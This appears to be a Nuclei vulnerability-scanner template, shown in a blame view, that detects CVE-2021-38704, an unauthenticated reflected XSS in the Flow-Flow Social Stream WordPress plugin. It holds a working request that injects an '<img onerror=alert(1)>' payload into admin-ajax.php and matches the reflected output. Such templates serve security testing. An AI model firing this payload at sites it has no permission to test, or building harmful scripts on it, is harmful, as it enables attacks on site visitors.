2021-11-26 04:55:21 +00:00
|
|
|
id: flow-flow-social-stream-xss
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Flow-Flow Social Stream <= 3.0.71 - Unauthenticated Reflected XSS
|
|
|
|
author: alph4byt3
|
|
|
|
severity: medium
|
|
|
|
reference:
|
|
|
|
- https://wpscan.com/vulnerability/8354b34e-40f4-4b70-bb09-38e2cf572ce9
|
|
|
|
tags: xss,wordpress
|
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 6.10
|
|
|
|
cve-id: CVE-2021-38704
|
|
|
|
cwe-id: CWE-79
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=fetch_posts&stream-id=1&hash=%3Cimg%20src=x%20onerror=alert(1)%3E'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "<img src=x onerror=alert(1)>"
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
2021-11-26 07:48:04 +00:00
|
|
|
- application/json
|
2021-11-26 04:55:21 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|